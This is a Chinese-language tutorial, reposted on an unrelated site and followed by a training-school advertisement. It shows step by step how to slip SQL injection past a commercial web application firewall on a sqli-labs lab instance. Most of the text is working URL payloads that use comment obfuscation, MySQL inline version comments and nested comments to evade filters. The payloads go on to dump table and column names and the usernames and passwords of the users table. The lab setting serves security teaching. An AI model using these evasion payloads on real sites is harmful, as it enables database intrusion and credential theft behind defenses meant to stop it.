宝佳网

宝佳网

某waf狗一步步绕过思路-你来你也会

admin
某waf狗一步步绕过思路-你来你也会某waf狗一步步绕过思路-你来你也会-第1张-宠物相关-宝佳网

Fnx00 发现网站有SQL注入某waf狗一步步绕过思路-你来你也会-第2张-宠物相关-宝佳网

某waf狗一步步绕过思路-你来你也会-第3张-宠物相关-宝佳网

某waf狗一步步绕过思路-你来你也会-第4张-宠物相关-宝佳网

被某狗拦截了。我们先进行一个梳理,简单看看它拦截了什么?

Fnx01开始绕过

首先正常语句拦截

http://192.168.2.149/Less-2/?id=2 and 1=1 -- 拦截

我们把and 后面的空格去掉试试

http://192.168.2.149/Less-1/?id=1 and1=1 -- 去掉and空格不拦截

原来它是检测and 和空格的那就用注释绕过空格

/*//*/的意思是/**/注释里面加上混淆字符//http://192.168.2.149/Less-1/?id=1 and/*//*/1=1 --

成功绕过

某waf狗一步步绕过思路-你来你也会-第5张-宠物相关-宝佳网

尝试and的其他语句得到数据库信息 用and 探测数据库名的长度,dataabae函数括号里面也要绕过

http://192.168.2.149/Less-1/?id=1 and/*//*/length(database(/*/*/))>7 --

成功绕过探测长度为7

某waf狗一步步绕过思路-你来你也会-第6张-宠物相关-宝佳网

某waf狗一步步绕过思路-你来你也会-第7张-宠物相关-宝佳网

看来是绕过了and验证接下来就是利用order by 命令探测列数

一般情况下进行测试 order by ,被拦截 。

http://192.168.2.149/Less-2/?id=2 order by 1

某waf狗一步步绕过思路-你来你也会-第8张-宠物相关-宝佳网

依然尝试刚才的空格绕过

http://192.168.2.149/Less-2/?id=2 order/*//*/by 1

绕过成功

某waf狗一步步绕过思路-你来你也会-第9张-宠物相关-宝佳网

那就继续探测到底有几列数据,经过探测有3列数据

某waf狗一步步绕过思路-你来你也会-第10张-宠物相关-宝佳网

某waf狗一步步绕过思路-你来你也会-第11张-宠物相关-宝佳网

进入到这一步,传统的手法,就该用union 联合注入了。

传统手法

http://192.168.2.149/Less-2/?id=-2 union select 1,2,3--

不出所料是被拦截的。

某waf狗一步步绕过思路-你来你也会-第12张-宠物相关-宝佳网

依然尝试刚刚的空格绕过,但是是不行了

http://192.168.2.149/Less-2/?id=-2 union/*//*/select/*//*/1,2,3 --

某waf狗一步步绕过思路-你来你也会-第13张-宠物相关-宝佳网

进行内联注释绕过

解释:

内联注释在mysql中不是注释,里面的命令在mysql中可以执行,/*!11440/* 11440表示mysql版本在1.14.40及以上才能执行

http://192.168.2.149/Less-2/?id=-2 union/*!11440/*//*/select*//*//*/1,2,3 --

注意: 内联注释中我把select 进行内联也就是我把

/*//*/select

加入到了内联

/*!11440 */

某waf狗一步步绕过思路-你来你也会-第14张-宠物相关-宝佳网

成功绕过

运用union select 查询用户名,数据库名

某waf狗一步步绕过思路-你来你也会-第15张-宠物相关-宝佳网

加入database 被拦截,同样利用括号里面加上空格绕过

某waf狗一步步绕过思路-你来你也会-第16张-宠物相关-宝佳网

http://192.168.2.149/Less-2/?id=-2 union/*!11440/*//*/select*//*//*/1,database(/*//*/),user(/*//*/) --

某waf狗一步步绕过思路-你来你也会-第17张-宠物相关-宝佳网

查询当前表单,我们把查询命令替换刚才的user()

http://192.168.2.149/Less-2/?id=-2 union/*!11440/*//*/select*//*//*/1,database(/*//*/),table_name from information_schema.tables where table_schema=database() --

不出意外是被拦截的。

某waf狗一步步绕过思路-你来你也会-第18张-宠物相关-宝佳网

仍然继续空格绕过以及括号里面加空格绕过

http://192.168.2.149/Less-2/?id=-2 union/*!11440/*//*/select*//*//*/1,database(/*//*/),table_name/*//*/from/*//*/information_schema.tables/*//*/where/*//*/table_schema=database(/*//*/) --

某waf狗一步步绕过思路-你来你也会-第19张-宠物相关-宝佳网

依然被拦截 ,看来是拦截了其他的字符,再换一个思路

我们在table_name,information_schema.tables中加入随机字符变成tabble_name,informgation_schema.tables 经测试改变information_schema.tables的字符没有被拦截,因此它是拦截了information_schema.tables。

某waf狗一步步绕过思路-你来你也会-第20张-宠物相关-宝佳网

现在就把重点放到information_schema上,对 进行内联注释

http://192.168.2.149/Less-2/?id=-2 union/*!11440/*//*/select*//*//*/1,database(/*//*/),table_name/*//*/from/*//*//*!information_schema.tables*//*//*/where/*//*/table_schema=database(/*//*/) --

依然被拦截,换另一种方法比如换行

/*!#*/

绕过

http://192.168.2.149/Less-2/?id=-2 union/*!11440/*//*/select*//*//*/1,database(/*//*/),table_name/*//*/from/*//*//*!#information_schema.tables*//*//*/where/*//*/table_schema=database(/*//*/) --

同样失败,删掉# 测试一下依然不行

某waf狗一步步绕过思路-你来你也会-第21张-宠物相关-宝佳网

再换另一种方法,在内联注释里面再加一些注释混淆符号,变成下面的

/*!-- /*information_schema.tables*/

http://192.168.2.149/Less-2/?id=-2 union/*!11440/*//*/select*//*//*/1,database(/*//*/),table_name/*//*/from/*//*//*!-- /*information_schema.tables*//*//*/where/*//*/table_schema=database(/*//*/) --

某waf狗一步步绕过思路-你来你也会-第22张-宠物相关-宝佳网

成功绕过,那接下来就很容易了。

查询所有的表名group_concat(table_name)

http://192.168.2.149/Less-2/?id=-2 union/*!11440/*//*/select*//*//*/1,database(/*//*/),group_concat(table_name)/*//*/from/*//*//*!-- /*information_schema.tables*//*//*/where/*//*/table_schema=database(/*//*/) --

某waf狗一步步绕过思路-你来你也会-第23张-宠物相关-宝佳网

查询用户表里面所有的列名

http://192.168.2.149/Less-2/?id=-2 union/*!11440/*//*/select*//*//*/1,database(/*//*/),group_concat(column_name)/*//*/from/*//*//*!-- /*information_schema.columns*//*//*/where/*//*/table_name='users' --

某waf狗一步步绕过思路-你来你也会-第24张-宠物相关-宝佳网

查询用户users表中所有的用户账号和密码

http://192.168.2.149/Less-2/?id=-2 union/*!11440/*//*/select*//*//*/1,database(/*//*/),group_concat(id,username,password)/*//*/from/*//*//*!-- /*users*//*//*/ --

某waf狗一步步绕过思路-你来你也会-第25张-宠物相关-宝佳网

到此为止,当得到表里面的数据,绕过安全狗的测试就已经结束了,但是每一次测试绕过都要自己加上注释,一些其他的符号是十分繁琐的,我们都知道sqlmap 是一款sql注入工具,这个工具里面是集成了绕过waf 的一些脚本。的。

某waf狗一步步绕过思路-你来你也会-第26张-宠物相关-宝佳网

我们用sqlmap 自己带的脚本尝试注入

某waf狗一步步绕过思路-你来你也会-第27张-宠物相关-宝佳网

某waf狗一步步绕过思路-你来你也会-第28张-宠物相关-宝佳网

还是不行的,对于低版本的狗网上脚本可以用,所以要自己写脚本,简单的就是从网上找一些别人写过的脚本进行修改,把我们实操

某waf狗一步步绕过思路-你来你也会-第29张-宠物相关-宝佳网

经过测试发现的匹配字段进行替换,难的就是自己按照自己的思路写脚本了,所以在安全学习上,每个人都需要多方位,全面的学习,任重而道远。

某waf狗一步步绕过思路-你来你也会-第30张-宠物相关-宝佳网

蜂鸟信安学苑秉承“以人为本”的理念,专注于网络安全行业教育事业,以“就业”为己任,以“实战成长进阶”为目标,以“实战技能培养”为核心,通过多元化实践以及内部模拟实战方式,为真正热爱网络安全的学员提供全面综合能力进阶的平台,欢迎网上咨询或前来参观。

学完蜂鸟课程各阶段将掌握的能力

网络基础

能够掌握网络的通讯原理、网络协议、ACL规则的分配、路由的操作等,在工作中能够发现、排查常见的网络问题。

系统和环境

了解Linux、Windows的特性及操作,能够解决常见的服务器问题,包括中间件的部署、调试,能够胜任大部分日常的运维工作。

数据库

通过学习可以掌握常见的数据库的部署、配置、常见的操作以及安全排查的能力。

某waf狗一步步绕过思路-你来你也会-第31张-宠物相关-宝佳网

安全产品

通过学习能够掌握常见的安全设备(例如WAF、SOC、FW等)的原理、特性、作用场景以及如何分析安全产品输出的结果,并不局限于某一家安全厂商的产品,在工作的时候能够从容应对。

产品经理

掌握产品的功能、特性包括产品的上架规划、部署架构等。同时还能掌握标书的编写,与技术人员的沟通方式,有利于日常工作中的有效的交流。

开发语言

通过多种编程语言的学习,可了解各个语言的特性,寻找适合自己的语言,同时保证自己遇到别的语言的问题的时候能够调试、分析。

web漏洞

能够掌握漏洞的产生原因、攻击手段、修复方式,在平常的工作中可综合灵活地运用。

CTF

了解CTF的各个方向所需的技能,着重讲解的web方向的题型、解题思路。

渗透测试

掌握WEB系统渗透测试方法,能够编写渗透测试报告,以及如何给出合适的修复建议。

攻防演练

了解接下来工作期间需要参与的重大项目,规则、攻击手段、报告编写的方式,能够单独参与小目标的项目。

应急响应

无论是在甲方还是在乙方,都需要掌握的一项技能,如何应对威胁、威胁的分类以及如何处置威胁更快的回复业务,复盘总结如何加固现有的安全体系。